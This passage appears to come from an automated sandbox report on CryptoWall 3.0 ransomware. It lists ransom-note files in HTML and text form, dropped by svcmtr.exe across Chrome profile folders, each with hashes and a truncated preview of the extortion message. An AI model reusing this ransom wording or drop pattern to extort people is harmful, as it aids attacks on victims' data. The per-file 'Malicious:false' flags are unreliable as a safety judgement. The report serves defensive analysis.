                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\1.0.6.0\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\1.0.0.14\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\1.0.0.14\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\7\_metadata\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\7\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\7\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

